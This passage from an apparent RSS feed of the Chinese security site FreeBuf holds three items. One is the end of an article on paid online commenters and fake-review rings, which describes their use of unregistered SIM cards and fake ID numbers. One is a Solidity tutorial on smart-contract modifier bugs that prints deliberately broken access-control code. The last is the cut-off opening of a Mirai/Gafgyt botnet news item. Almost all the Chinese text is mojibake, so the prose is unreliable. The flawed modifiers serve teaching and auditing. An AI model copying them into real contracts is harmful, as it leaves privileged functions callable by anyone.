167<p style="text-align: justify;">他们也曾网上冲浪,éšç€äº’è”网的è¿ä»£å˜è¿ï¼Œä»–们激战过天涯ã€çŒ«æ‰‘ã€è¥¿ç¥ 胡åŒï¼Œä¹Ÿæ›¾åœ¨åšå®¢ã€å¼€å¿ƒã€äººäººä¸ŠæŒ‡ç‚¹æ±Ÿå±±ï¼ŒåŽæ¥ä»–们转战微åšã€å¾®ä¿¡ã€ç”µå•†ã€‚</p>
168<p style="text-align: justify;">å¦‚ä»Šï¼Œä»–ä»¬å·²æ¸—é€æ•´ä¸ªäº’è”网世界,并且构建了一个庞大的黑色 “生æ€â€ã€‚</p>
169<p><img alt="æœªæ ‡é¢˜-11.jpg" src="http://image.3001.net/images/20180724/1532437088769.jpg!small" width="690" height="383"></p>
170<h2><strong>æ— æ‰€ä¸èƒ½â€œ<strong>五毛党</strong>â€</strong></h2>
171<p style="margin-left: 8px;">作为ä¸å›½äº’è”网的特色产物,èŒä¸šæˆ–åŠèŒä¸šçš„付费写手称为互è”网水军,而在这里é¢ï¼Œè§„æ¨¡æœ€ä¸ºåºžå¤§çš„è¦æ•°äº”毛党。 </p>
172<p style="margin-left: 8px;">“五毛党â€åœ¨å¹¿ä¹‰ä¸Šï¼Œå¤šæŒ‡äº’è”网当ä¸ï¼Œä¸ºäº†é’±è€Œå޻呿Ÿä¸ªå¸–,é˜è¿°æŸä¸ªè§‚点的人。åˆå› 为最早的å‘帖者除底薪外,æ¯å¸–按五毛钱æ¥åŠ è–ªï¼Œè¢«ç½‘æ°‘æˆç§°ä¸ºâ€œäº”毛党â€ã€‚他们ä¹äºŽä¸ºä»˜è´¹äººå£«åœ¨äº’è”ç½‘ä¸ŠçŒæ°´ï¼ŒåŒ…括å‘帖ã€è¯„论ã€ä¼ æ’æµè¨€æˆ–è€…å¸¦æœ‰æŒ‡å‘æ€§çš„舆论信æ¯ç‰ç‰ã€‚</p>
173<p style="margin-left: 8px;">åŠ æ‹¿å¤§ç»´å¤šåˆ©äºšå¤§å¦çš„ç ”ç©¶äººå‘˜æ›¾è”åˆåŒ—京大å¦çš„å¦è€…å…±åŒå‘布了一项å为《Undercover Researchers Expose Chinese Internet Water Army》的报告,直指ä¸å›½ç½‘络水军:</p>
174<p><img alt="375527419406251655848729.png" src="http://image.3001.net/images/20180724/15324373579452.png!small" width="294" height="507"></p>
175<p style="margin-left: 8px;">æŠ¥å‘Šä¸»è¦æœé›†äº†æ–°æµªã€æœç‹ä¸¤å®¶é—¨æˆ·ç½‘站的700个用户近20,000æ¡è¯„论数æ®ï¼Œå¹¶è¯•图区别“五毛党â€ä¸Žæ£å¸¸ç”¨æˆ·çš„区别。最终å‘现:</p>
176<p style="margin-left: 8px;">â€œäº”æ¯›å…šâ€æ›´å€¾å‘于å‘è¡¨æ–°çš„è¯„è®ºï¼Œè€Œä¸æ˜¯å¯¹å…¶å®ƒè¯„论进行回å¤ã€‚å…¶ä¸ï¼Œè¶…过50%的人会间隔2.5分钟就会å‘一个新帖。与普æ£å¸¸ç”¨æˆ·ç›¸æ¯”ï¼Œä»–ä»¬ä¼šæ›´å¿«åœ°ä»Žè®¨è®ºä¸æŠ½èº«è€Œå‡ºï¼Œå¹¶å°†ID弃而ä¸ç”¨ã€‚而且,他们æ¯ä¸ªäººå‘布的内容也有很大ä¸åŒï¼Œè¿™äº›äººå¤§å¤šé€šè¿‡å‰ªè´´æ–¹å¼ï¼Œåå¤å‘表相åŒå†…容。调查人员å‘现,在新浪,æœç‹ç½‘站上,相似评论内容的é‡å¤çŽ‡é«˜è¾¾88%。</p>
177<p><img alt="ea4bcbef76094b3605bedc79a3cc7cd98c109d59副本.jpg" src="http://image.3001.net/images/20180724/15324373842246.jpg!small" width="622" height="1200"></p>
178<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">ç½‘ä¼ â€œäº”æ¯›å…šâ€å·¥èµ„清å•</span></p>
179<p style="margin-left: 8px;">而在“五毛党â€ä¸‹æ¸¸ï¼Œåˆæœ‰ä¼—å¤šåˆ†æ”¯ï¼ŒèƒŒåŽæ˜¯ä¸€æ¡ç”±æŽ¨æ‰‹ã€æžªæ‰‹ã€æ°´å†›ç»„æˆçš„庞大的利益链桅…</p>
180<p style="margin-left: 8px;">æ®æ–°åŽç¤¾æŠ¥ï¼Œ2017å¹´5月以æ¥ï¼Œä¸åŽäººæ°‘共和国公安部部署å„地公安机关开展打击“网络水军â€å…¨å›½é›†ç¾¤æˆ˜å½¹ï¼Œå·²ç ´èŽ·â€œç½‘ç»œæ°´å†›â€è¿æ³•犯罪案件40余起,涉案总金é¢ä¸Šäº¿å…ƒï¼ŒæŠ“èŽ·è¿æ³•犯罪嫌疑人200ä½™äººï¼ŒæŸ¥èŽ·å¹¶å…³åœæ¶‰å«Œéžæ³•炒作的网络账å·5000余个,关é—è¿æ³•è¿è§„网站上万个,涉åŠç½‘ä¸Šæ¶æ„ç‚’ä½œä¿¡æ¯æ•°åƒä¸‡æ¡ã€‚</p>
181<p style="margin-left: 8px;">然而,黑产世界何其之大,全国èŒä¸šæˆ–åŠèŒä¸šâ€œäº”毛党â€ä½•æ¢åƒä¸‡ï¼</p>
182<h2><strong>电商æ»ç©´â€œå·®è¯„师â€</strong><br /></h2>
183<p style="margin-left: 8px;">å¦‚æžœå°†â€œäº”æ¯›å…šâ€æ¯”作网络水军人海战术般的野路å,那么èŒä¸šå·®è¯„师就是网络水军ä¸çš„特ç§å…µã€‚3-5人编制的èŒä¸šå·®è¯„å¸ˆï¼Œå‡ å¤©ä¸‹æ¥ç”šè‡³å¯ä»¥æžåž®ä¸€å®¶ç½‘çº¢åº—ï¼ </p>
184<p><img alt="timg.jpeg" src="http://image.3001.net/images/20180724/15324374505772.jpeg!small" width="550" height="990"></p>
185<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">èŒä¸šå·®è¯„师”æ“作æµç¨‹å›¾</span></p>
186<p style="text-align: justify;">与“五毛党â€ä¸åŒï¼Œä»–ä»¬çš„ä¸šåŠ¡æ›´åŠ ç²¾å‡†ï¼Œå°±æ˜¯å·®è¯„ã€‚å› ä¸ºåšçš„就是电商的生æ„,所以这次淘å®ä¸Šè‚¯å®šæ˜¯æ‰¾ä¸åˆ°ä»–们的身影。他们体é‡åºžå¤§ï¼Œèµ·æ¥éƒ½æ˜¯è§„模达2000人的QQ群……</p>
187<p><img alt="图片 1副本.jpg" src="http://image.3001.net/images/20180724/15324375065170.jpg!small" width="690" height="1200"></p>
188<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">èŒä¸šå·®è¯„师“工作交æµç¾¤â€</span></p>
189<p style="text-align: justify;">与其他黑产群ä¸åŒï¼Œè¿™ä¸ªå‡ 乎ä¸è®¾é—¨æ§›ï¼Œå¾ˆå®¹æ˜“就混进3个2000人群。但当Magiccc准备干活时,傻了眼:</p>
190<p><img alt="WX20180724-074734@2x.png" src="http://image.3001.net/images/20180724/15324375392553.png!small" width="690" height="1200"></p>
191<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">群内全员ç¦è¨€</span></p>
192<p style="text-align: justify;">å¯èƒ½æ˜¯å¯Ÿè§‰åˆ°äº†ä»€ä¹ˆï¼Œå…¶ä»–å‡ ä¸ªç¾¤éƒ½æ˜¯ç¦è¨€çжæ€ã€‚没办法,åªè¦å¦æ‰¾è·¯åï¼ŒåŠ äº†ä¸ªâ€œèŒæ–°ç¾¤â€ï¼Œå¦è¾Ÿè¹Šå¾„……</p>
193<p style="text-align: justify;">然而,没想到的是,这些群在临近æ£å¸¸ä¸Šçæ—下ç的点,开始活跃起楅…</p>
194<p style="text-align: center;"><img alt="201207124231342074794468 (1)副本.jpg" src="http://image.3001.net/images/20180724/15324376192077.jpg!small" width="300" height="787"><img alt="201207124231342074794468 (1).jpg" src="http://image.3001.net/images/20180724/15324375725872.jpg!small" width="300" height="377"></p>
195<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">â€œèŒæ–°ç¾¤â€ä»¥è€å¸¦æ–°</span></p>
196<p style="text-align: justify;">æ ¹æ®ç»éªŒï¼Œè¿™ç¾¤äººæåˆ°çš„“肉â€åº”该是行业暗è¯ã€‚群主“english nameâ€åœ¨çº¿ä¸ºæ–°äººåšå¼•导,è¯è¯´50元的入会费真心ä¸è´µ……(相较æŸäº›é»‘äº§åŠ¨è¾„å‡ ç™¾ä¸Šåƒçš„费用,èŒä¸šå·®è¯„师的门槛算良心价)</p>
197<p style="text-align: justify;">èŒä¸šå·®è¯„师,把电商的店铺称为“肉â€ï¼Œä¸€èˆ¬éƒ½ä¼šé€‰æ‹©æ–°å¼€çš„网店,寻找网店å«â€œæ‰¾è‚‰åƒâ€ï¼Œæ–°å…¥è¡Œçš„差评师通过验è¯çš„æš—è¯é€šå¸¸ä¸ºâ€œæ±‚åƒè‚‰â€ã€‚在这个新人群里,群主表示这仅仅是一个准备群。</p>
198<p style="text-align: justify;">群主“english nameâ€åå¤è¡¨ç¤ºï¼Œâ€œä½ 们è¦ç”¨è„‘ï¼è¦ç”¨è„‘ï¼çœ‹çœ‹ç¾¤ç›¸å†Œé‡Œé¢çš„æµç¨‹å›¾ï¼Œåšå¥½å‡†å¤‡å†æ¥å«æˆ‘ï¼â€è€Œæ ¹æ®è¿™ä¸ªæµç¨‹å›¾æ¥çœ‹ï¼Œä¸€ä¸ªæ–°å…¥é—¨çš„“èŒä¸šå·®è¯„师â€é¦–å…ˆè¦å‡†å¤‡æ‰“猎用的“枪â€ï¼šä¸€ä¸ªä¸è®°å的手机å¡ï¼ˆé»‘å¡ï¼‰ã€ä¸€ä¸ªå‡çš„身份è¯ï¼ˆä¹Ÿèƒ½å¼„到真的),然åŽé€šè¿‡è¿™ä¸ªå‡çš„身份è¯ï¼ŒåŽ»æ·˜å®æ³¨å†Œæ”¯ä»˜å®å’Œè´¦æˆ·ã€‚</p>
199<p style="text-align: justify;">没有手机å¡ä¸è¦ç´§ï¼Œç¾¤ä¸»æé†’å…¥é—¨è€…åŽ»æŒ‡å®šæ¸ é“è´ä¹°ï¼›æ²¡æœ‰å‡èº«ä»½è¯ä¸è¦ç´§ï¼Œåªéœ€è¦åœ¨ç¾¤ä¸»å¤„缴纳50元的入门费,就å¯ä»¥å¾—到一串身份è¯å·ã€‚æœåŠ¡å¯è°“是细致入微,教å¦è´¨é‡å¯æƒ³è€ŒçŸ¥……</p>
200<p style="text-align: justify;">这群人都是昼ä¼å¤œå‡ºï¼Œèµ„深差评师一般都是å•干,当然å¶å°”ä¹Ÿä¼šå¸¦ç€æ–°äººâ€œåˆ·ä»»åŠ¡â€ã€‚</p>
201<p style="text-align: justify;">而这时候,å¦å¤–接任务的åƒäººç¾¤ä¹Ÿå¼€å§‹æ´»è·ƒèµ·æ¥ï¼š</p>
202<p><img alt="WechatIMG884.png" src="http://image.3001.net/images/20180724/15324376606316.png!small" width="690" height="1200"></p>
203<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">业务群开始接å•</span></p>
204<p style="text-align: justify;">è€Œåœ¨ç™½å¤©ï¼Œæœ‰å‡ ä¸ªç¾¤ä¸»è¯•æŽ¢æ€§çš„æ‰¾åˆ°MagicccèŠäº†ä¸‹ï¼Œè¡Œæƒ…å·®ä¸å¤šåœ¨15元到20元之间,当然å¯èƒ½è¿˜æœ‰æ›´ä½Žçš„。</p>
205<p><img alt="图片 1.jpg" src="http://image.3001.net/images/20180724/15324377031661.jpg!small" width="490" height="1200"><img alt="13.png" src="http://image.3001.net/images/20180724/15324376836780.png!small" width="642" height="770"></p>
206<p style="text-align: center;">
207<p style="text-align: justify;">å¦å¤–ä¸€ä¸ªâ€œèŒæ–°ç¾¤â€ï¼ŒMagiccc很快跟一ä½èµ„æ·±èŒä¸šå·®è¯„师混熟,这ä½è€å¸ˆå‚…表示“æ¯å¤©æ™šä¸Š10点,他会通过YYè¯éŸ³ç‚¹å,11点æ£å¼å¼€å§‹å¸¦æ–°äººåƒè‚‰â€ã€‚åŽæ¥è·Ÿè€å¸ˆå‚…èŠå¼€äº†ï¼Œä»–表示,他们手上有éžå¸¸å¤šçš„åƒäººç¾¤ï¼Œçœ‹æˆ‘åŠå¤©æ²¡å›žæ¶ˆæ¯ï¼Œä»–还以为我ä¸ç›¸ä¿¡ï¼ˆåˆ«è¯´åƒäººç¾¤äº†ï¼Œä½ 就说是万人群我都信)……</p>
208<p style="text-align: justify;">è€å¸ˆè¿˜è¡¨ç¤ºï¼Œåœ¨åƒäººç¾¤é‡Œï¼Œè°ˆåˆ¤æ‰‹æŽ¥åˆ°é¡¹ç›®åŽï¼Œä¼šæŠŠé’±ç›´æŽ¥è½¬å…¥å¤§å®¶çš„æ‹å·æ”¯ä»˜å®ä¸ã€‚一å•15å…ƒï¼Œæ¯æ™šéšä¾¿æŽ¥ä¸ª10å•,就是150å…ƒï¼Œåƒæˆ‘è¿™æ ·çš„â€œèŒæ–°â€å…¥è¡Œæœˆå…¥4500å…ƒä¸æˆé—®é¢˜ï¼è€Œèµ„æ·±å·®è¯„å¸ˆï¼Œæ›´æ˜¯è½»æ¾æœˆæ”¶å…¥ä¸Šä¸‡……</p>
209<h2><strong>水深难防,电商平å°è‹¦ä¸å ªè¨€</strong></h2>
210<p style="text-align: justify;">我们都知é“ï¼Œæ·˜å®æžè¿‡èŒä¸šå·®è¯„师æ›å…‰å¹³å°ï¼Œä½†æ˜¯å› 为éšç§é—®é¢˜ï¼Œäº‰è®®ä¸æ–ï¼ŒåŽæ¥ä¹Ÿä¸äº†äº†ä¹‹ã€‚而这之åŽï¼Œè¿™ç¾¤äººæ›´åŠ æœ‰æƒæ— æï¼</p>
211<p style="text-align: center;"><img alt="12121212.jpg" src="http://image.3001.net/images/20180724/15324377485875.jpg!small" width="640" height="332"><span style="color: rgb(159, 163, 168);">曾ç»çš„差评师查询平å°</span></p>
212<p>而现在,电商平å°çš„å–家,åªèƒ½é€šè¿‡æ·˜æŸ¥æŸ¥ã€æŸ¥å°å·ç‰ä¸€äº›åœ¨çº¿ä»˜è´¹å¹³å°è¿›è¡Œä¹°å®¶ä¿¡èª‰åˆ†æŸ¥è¯¢ã€‚ç„¶åŽï¼Œé€šè¿‡è¿™äº›ä¿¡æ¯åˆ¤æ–买家身份,至于效果如何,就ä¸å¾—而知了。</p>
213<p><img alt="WechatIMG3454.jpeg" src="http://image.3001.net/images/20180724/1532437774444.jpeg!small" width="690" height="329"></p>
214<p style="text-align: center;"><span style="color: rgb(159, 163, 168);">第三方查询å‚考信æ¯</span></p>
215<p>å•从信誉级别æ¥çœ‹ï¼Œè¿™ä¸ªè¢«å°å·çš„èŒä¸šå·®è¯„师账å·å¯ä»¥è¯´éžå¸¸éšè”½ï¼Œ97.66%的好评率能够骗过ä¸å°‘电商å–家。</p>
216<p>Magiccc认为,这些网络水军所谓的利益链金å—塔尖,背åŽéƒ½æ˜¯å“ªäº›äººã€‚è¡Œä¸šçš„æ¶æ€§ç«žäº‰ï¼Œä¸€æ–¹é¢é€šè¿‡æ³•å¾‹ä¸¥åŠ ç®¡æŽ§ï¼Œçº¦æŸä¼ä¸šï¼Œå¦å¤–针对水军ä¸çš„â€œå›¢é•¿â€æˆ–“水æ¯â€è¿™ç±»ç®¡ç†äººå‘˜ï¼Œä¹Ÿéœ€è¦ä¸¥æ ¼æ‰“击。</p>
217<p><img alt="778787878787.png" src="http://image.3001.net/images/20180724/15324378022158.png!small" width="690" height="489"></p>
218<p>å¦å¤–一方é¢ï¼Œç›®å‰è¡Œä¸šç±»éžå¸¸å¤šçš„安全æœåŠ¡å•†ä¹Ÿå·²å…·å¤‡æˆç†Ÿçš„忬ºè¯ˆé£ŽæŽ§äº§å“以åŠè§£å†³æ–¹æ¡ˆã€‚基于海é‡ç”¨æˆ·æ•°æ®ï¼Œåˆ©ç”¨äººå·¥æ™ºèƒ½æŠ€æœ¯ï¼Œæå»ºè¡Œä¸ºæ¨¡åž‹å¹¶é€šè¿‡å›¢ä¼™å‘现,将业务安全风险扼æ€åœ¨æ‘‡ç¯®ä¸ï¼Œä»Žè€Œæå«ä¼ä¸šç½‘络资产,维护网络æ£å¸¸ç§©åºã€‚</p>
219<p><b style="color: rgb(159, 163, 168);">*本文作者:GEETESTæžéªŒï¼Œè½¬è½½è¯·æ³¨æ˜Žæ¥è‡ªFreeBuf.COM</b> </p>
220]]></content:encoded>
221 <wfw:commentRss>http://www.freebuf.com/articles/network/178669.html/feed</wfw:commentRss>
222 <slash:comments>16</slash:comments>
223 </item>
224 <item>
225 <title>修饰器(modifierï¼‰ç›¸å…³æ¼æ´žåˆ†æž</title>
226 <link>http://www.freebuf.com/vuls/178726.html</link>
227 <comments>http://www.freebuf.com/vuls/178726.html#comments</comments>
228 <pubDate>Thu, 26 Jul 2018 05:00:06 +0000</pubDate>
229 <dc:creator>BUGX</dc:creator>
230 <category><![CDATA[区å—链安全]]></category>
231 <category><![CDATA[æ¼æ´ž]]></category>
232 <category><![CDATA[modifier]]></category>
233 <category><![CDATA[修饰器]]></category>
234
235 <guid isPermaLink="false">http://www.freebuf.com/?p=178726</guid>
236 <description><![CDATA[一ã€å‰è¨€ 修饰器(modifier)å¯ä»¥æ”¹å˜å‡½æ•°çš„行为,例如作为å‰ç½®çš„æ£€æµ‹æ¡ä»¶ã€‚åŒæ—¶ä¿®é¥°å™¨å…·æœ‰å¯ç»§æ‰¿å±žæ€§ï¼Œå¯ä»¥ç”±æ´¾ç”Ÿåˆçº¦ä¸çš„定义覆盖。本次BUGX.IO区å—é“¾å®‰å…¨è¯¾å ‚ç»™å¤§å®¶è¿›è¡Œä¿®é¥°å™¨çš„ç›¸å…³æ¼æ´žåˆ†æžã€‚ 二ã€ä»€ä¹ˆæ˜¯ä¿®é¥°å™¨ 修饰器具有å¯ç»§æ‰¿å±žæ€§ï¼Œå¯ä»¥ç”±æ´¾ç”Ÿåˆçº¦ä¸çš„定义覆盖,如下示例代ç ,由于 onlyOwner 的修饰,给 foo å‡½æ•°åŠ äº†ä¸€ä¸ªå‰ç½®æ¡ä»¶ï¼Œå³åªæœ‰ owner æ‰èƒ½æˆåŠŸè°ƒç”¨æ¤å‡½æ•°ï¼Œå¦åˆ™å°±ä¼šæŠ¥é”™å›žæ»šã€‚其丠`_;` è¡¨ç¤ºå‡½æ•°ä¸çš„其余代ç 。 pragma solidity ^0.4.24; contract Foo {   address public owner;   constructor() public {       owner = msg.sender;   }   modifier onlyOwner() {       require(msg.sender == owner);       _;   }   function foo() onlyOwner public view returns(bool){       return true;   } } å¹¶ä¸”ï¼Œä¿®é¥°å™¨ä¹Ÿèƒ½å¸¦å…¥å‚æ•°ï¼Œå¦‚: modifier assertValueIsOne(uint value) {   assert(value == 1);   _; // original function goes at this point } function doSomething(uint value) assertValueIsOne(value) {   // do Something } 三ã€å¸¸è§ä¿®é¥°å™¨ 常è§çš„库åˆçº¦åŒ…括管ç†è€…æƒé™æŽ§åˆ¶åˆçº¦ã€æš‚åœåŠŸèƒ½åˆçº¦ã€é»‘åå•管ç†åˆçº¦ã€æ—¥å¿—记录ç‰ç‰ï¼Œè€Œå¸¸è§çš„修饰器有 onlyOwnerã€isOwnerã€whenNotPausedã€whenPausedã€managerã€executeã€onlyContractCreator ç‰ç‰ã€‚ å¸¸è§æƒé™æŽ§åˆ¶çš„修饰器写法有: modifier onlyOwner(){     if(msg.sender != owner){ throw;}     _; […]]]></description>
237 <content:encoded><![CDATA[<p><img alt="jhk-1532485926451.jpeg" src="http://image.3001.net/images/20180725/15325007614739.jpeg!small" width="690" height="459"></p>
238<h2><strong><b style=""><span style="color: rgb(51, 51, 51);">一ã€å‰è¨€</span></b></strong></h2>
239<p style="text-align: justify;"><span style="color: rgb(0, 176, 80);"><b>修饰器(modifier)å¯ä»¥æ”¹å˜å‡½æ•°çš„行为,例如作为å‰ç½®çš„æ£€æµ‹æ¡ä»¶ã€‚åŒæ—¶ä¿®é¥°å™¨å…·æœ‰å¯ç»§æ‰¿å±žæ€§ï¼Œå¯ä»¥ç”±æ´¾ç”Ÿåˆçº¦ä¸çš„定义覆盖。本次BUGX.IO区å—é“¾å®‰å…¨è¯¾å ‚ç»™å¤§å®¶è¿›è¡Œä¿®é¥°å™¨çš„ç›¸å…³æ¼æ´žåˆ†æžã€‚</b></span></p>
240<h2><b style=""><span style="color: rgb(51, 51, 51);">二ã€ä»€ä¹ˆæ˜¯ä¿®é¥°å™¨</span></b><br /></h2>
241<p style="text-align: justify;">修饰器具有å¯ç»§æ‰¿å±žæ€§ï¼Œå¯ä»¥ç”±æ´¾ç”Ÿåˆçº¦ä¸çš„定义覆盖,如下示例代ç ,由于 onlyOwner 的修饰,给 foo å‡½æ•°åŠ äº†ä¸€ä¸ªå‰ç½®æ¡ä»¶ï¼Œå³åªæœ‰ owner æ‰èƒ½æˆåŠŸè°ƒç”¨æ¤å‡½æ•°ï¼Œå¦åˆ™å°±ä¼šæŠ¥é”™å›žæ»šã€‚å…¶ä¸ <span style="color: rgb(206, 145, 120);">`_;`</span> 表示函数ä¸çš„其余代ç 。</p>
242</p>
243<pre><code>pragma solidity ^0.4.24;
244contract Foo {
245 address public owner;
246 constructor() public {
247 owner = msg.sender;
248 }
249 modifier onlyOwner() {
250 require(msg.sender == owner);
251 _;
252 }
253 function foo() onlyOwner public view returns(bool){
254 return true;
255 }
256}<br /></code></pre>
257</p>
258<p>å¹¶ä¸”ï¼Œä¿®é¥°å™¨ä¹Ÿèƒ½å¸¦å…¥å‚æ•°ï¼Œå¦‚:</p>
259</p>
260<pre><code>modifier assertValueIsOne(uint value) {
261 assert(value == 1);
262 _; // original function goes at this point
263}
264function doSomething(uint value) assertValueIsOne(value) {
265 // do Something
266}<br /></code></pre>
267</p>
268<h2><b style="color: rgb(51, 51, 51);">三ã€å¸¸è§ä¿®é¥°å™¨</b></h2>
269<p style="text-align: justify;">常è§çš„库åˆçº¦åŒ…括管ç†è€…æƒé™æŽ§åˆ¶åˆçº¦ã€æš‚åœåŠŸèƒ½åˆçº¦ã€é»‘åå•管ç†åˆçº¦ã€æ—¥å¿—记录ç‰ç‰ï¼Œè€Œå¸¸è§çš„修饰器有 onlyOwnerã€isOwnerã€whenNotPausedã€whenPausedã€managerã€executeã€onlyContractCreator ç‰ç‰ã€‚</p>
270<p style="text-align: justify;">å¸¸è§æƒé™æŽ§åˆ¶çš„修饰器写法有:</p>
271</p>
272<pre><code>modifier onlyOwner(){
273 if(msg.sender != owner){ throw;}
274 _;
275}
276modifier onlyOwner{
277 if(msg.sender != owner){
278 revert();
279 }else{
280 _;
281 }
282 }
283modifier onlyOwner() {
284 if(msg.sender != owner) revert();
285 _;
286}
287modifier onlyOwner() {
288 require(msg.sender == owner);
289 _;
290}
291modifier onlyOwner {
292 assert(msg.sender == owner);
293 _;
294}
295
296
297
298<br /></code></pre>
299<p>日志记录:</p>
300</p>
301<pre><code>event StartEvent();
302event FinishEvent();
303modifier logEvents {
304 StartEvent();
305 _;
306 FinishEvent();
307}
308function toggle () logEvents {
309}
310
311<br /></code></pre>
312<h2><b style=""><span style="color: rgb(51, 51, 51);">å››ã€å¸¸è§ä¿®é¥°å™¨æ¼æ´žç±»åž‹</span></b><br /></h2>
313<p><strong>1ã€Modifier Wrong Check 修饰器检测逻辑错误</strong></p>
314<p style="text-align: justify;">修饰器ä¸çš„判æ–é”™è¯¯ï¼Œå¯¼è‡´ä¿®é¥°å™¨æ— æ³•èµ·åˆ°å¼€å‘者预期的控制作用。</p>
315<p style="text-align: justify;">如 I_See_Voice_Token (ISVT) åˆçº¦ :</p>
316<p style="text-align: justify;"><a href="https://etherscan.io//address/0xa6b0412276b2484cfb370890b9d07e0c8f1f7684#code">https://etherscan.io//address/0xa6b0412276b2484cfb370890b9d07e0c8f1f7684#code</a> </p>
317</p>
318<pre><code>modifier onlyOwner() {
319 require(msg.sender != owner);
320 _;
321}<br /></code></pre>
322</p>
323<p style="text-align: justify;">
324<p style="text-align: justify;">æ£ç¡®çš„写法应该是 <span style="color: rgb(206, 145, 120);">`==`</span> ,结果错写æˆäº† <span style="color: rgb(206, 145, 120);">`!=`</span>,从é¢é€ æˆäº†æƒé™æŽ§åˆ¶å¤±æ•ˆã€‚</p>
325<p><strong>2ã€Modifier Invalid Check ä¿®é¥°å™¨æ£€æµ‹æ— æ•ˆæ¼æ´ž</strong></p>
326<p style="text-align: justify;">缺少使用 if〠if throwã€if revert()ã€requireã€assert 作为æ¡ä»¶åˆ¤æ–ï¼Œä½¿å¾—åˆ¤æ–æ— 效,导致修饰器的æƒé™æŽ§åˆ¶åŠŸèƒ½å¤±æ•ˆã€‚</p>
327<p style="text-align: justify;">如 BancorKiller åˆçº¦ :</p>
328<p style="text-align: justify;"><a href="https://etherscan.io//address/0x32a8c2da487ff26ef5778fd44dc8eaa73d7bb437#code">https://etherscan.io//address/0x32a8c2da487ff26ef5778fd44dc8eaa73d7bb437#code</a> </p>
329</p>
330<pre><code>modifier onlyAdmin() {
331 msg.sender == admin;
332 _;
333}<br /></code></pre>
334</p>
335<p style="text-align: justify;">
336<p style="text-align: justify;">
337<p style="text-align: justify;">使用以下代ç 进行测试,å¯ä»¥å‘现,任何人都å¯ä»¥è°ƒç”¨ foo_flaw 函数,æ£ç¡®å†™æ³•çš„ foo_right å‡½æ•°åˆ™åªæœ‰ç®¡ç†å‘˜æ‰å¯ä»¥è°ƒç”¨ã€‚</p>
338</p>
339<pre><code>pragma solidity ^0.4.24;
340contract foo {
341 address public admin;
342 constructor() public {
343 admin = msg.sender;
344 }
345 modifier onlyAdmin_flaw() {
346 msg.sender == admin;
347 _;
348 }
349 function foo_flaw() onlyAdmin_flaw public view returns(bool){
350 return true;
351 }
352
353 modifier onlyAdmin_right() {
354 require(msg.sender == admin);
355 _;
356 }
357 function foo_right() onlyAdmin_right public view returns(bool){
358 return true;
359 }
360}
361
362
363
364<br /></code></pre>
365<p><strong>3ã€æ›´å¤æ‚的情况带å‚ä¿®é¥°å™¨æ¼æ´ž</strong></p>
366<p style="text-align: justify;">ç”±äºŽä¿®é¥°å™¨èƒ½å¤Ÿå¸¦å‚æ‰§è¡Œï¼Œè¿™ç§ç±»åž‹çš„æ¼æ´žå°±åªèƒ½æŒ‰ç…§å®žé™…情况进行分æžã€‚</p>
367<h2><b style=""><span style="color: rgb(51, 51, 51);">五ã€ä¿®å¤æ–¹æ¡ˆ</span></b><br /></h2>
368<p style="text-align: justify;"> ä¸¥æ ¼éªŒè¯ä¿®é¥°å™¨çš„åˆ¤æ–æ¡ä»¶ï¼Œåˆçº¦å‘布åšå¥½å‰å……分的功能测试。</p>
369<h2><b style="">å…ã€å‚考资料</b></h2>
370<p style="text-align: justify;"> <a href="https://solidity.readthedocs.io/en/latest/contracts.html?highlight=modifier#function-modifiers">https://solidity.readthedocs.io/en/latest/contracts.html?highlight=modifier#function-modifiers</a> </p>
371<h2><b style="">七ã€å…¬å¸ä»‹ç»</b><br /></h2>
372<p style="text-align: justify;">BUGX.IO是一家致力于区å—链领域的安全公å¸ã€‚æ ¸å¿ƒå›¢é˜Ÿç»„å»ºäºŽ2014年,我们在区å—链生æ€å®‰å…¨ã€è¡Œä¸šè§£å†³æ–¹æ¡ˆã€å®‰å…¨å»ºè®¾ã€çº¢è“å¯¹æŠ—ç‰æ–¹é¢æœ‰æ·±åŽšç§¯ç´¯ä¸Žè¿‡ç¡¬ä¸“ä¸šç´ å…»ã€‚</p>
373<p style="text-align: justify;"><span style="color: rgb(159, 163, 168);"><b>*本文作者:BUGX.IO-Tri0nes,转载请注明æ¥è‡ªFreeBuf.COM</b></span></p>
374]]></content:encoded>
375 <wfw:commentRss>http://www.freebuf.com/vuls/178726.html/feed</wfw:commentRss>
376 <slash:comments>1</slash:comments>
377 </item>
378 <item>
379 <title>Miraiå’ŒGafgyt僵尸网络新å˜ç§è¿‘期å分活跃</title>
380 <link>http://www.freebuf.com/news/178824.html</link>
381 <comments>http://www.freebuf.com/news/178824.html#comments</comments>
382 <pubDate>Thu, 26 Jul 2018 02:53:12 +0000</pubDate>
383 <dc:creator>Alpha_h4ck</dc:creator>
384 <category><![CDATA[网络安全]]></category>
385 <category><![CDATA[资讯]]></category>
386 <category><![CDATA[Gafgyt]]></category>
387 <category><![CDATA[Miraiå˜ç§]]></category>
388 <category><![CDATA[僵尸网络]]></category>
389
390 <guid isPermaLink="false">http://www.freebuf.com/?p=178824</guid>
391 <description><![CDATA[安全专家è¦å‘Šç§°ï¼Œå¹¿å¤§ç”¨æˆ·è¿‘期应该å°å¿ƒMiraiå’ŒGafgytåƒµå°¸ç½‘ç»œäº†ï¼Œå› ä¸ºè¿™ä¸¤ä¸ªè‡åæ˜è‘—的物è”网僵尸网络åˆå¼€å§‹æ´»è·ƒäº†èµ·æ¥ã€‚ å®‰å…¨ä¸“å®¶é€šè¿‡ç ”ç©¶å‘现,Miraiå’ŒGafgyt这两个僵尸网络近期ååˆ†æ´»è·ƒï¼Œä¸æŽ’é™¤æ”»å‡»è€…è®¡åˆ’è¿›è¡Œæ–°ä¸€è½®å¤§è§„æ¨¡ç½‘ç»œæ”»å‡»çš„å¯èƒ½æ€§ã€‚由于Mirai僵尸网络的æºä»£ç æ¤å‰å·²æ³„露在网络上,紧跟ç€çš„就是å„ç§Miraiå˜ç§å¼€å§‹æ³›æ»¥äºŽâ€œæ±Ÿæ¹–â€ã€‚仅在2018年,就已ç»å‡ºçŽ°äº†ç±»ä¼¼Satoriã€Masutaã€WickedMirai〠JenXã€Omniå’ŒOMGç‰å¤šæ¬¾Mirai僵尸网络å˜ç§ã€‚ Gafgyt僵尸网络,åˆåBashlite或Lizkebab,该僵尸网络首次出现于2014年,其æºä»£ç 泄露于2015å¹´åˆã€‚æ ¹æ®Flashpointçš„ç 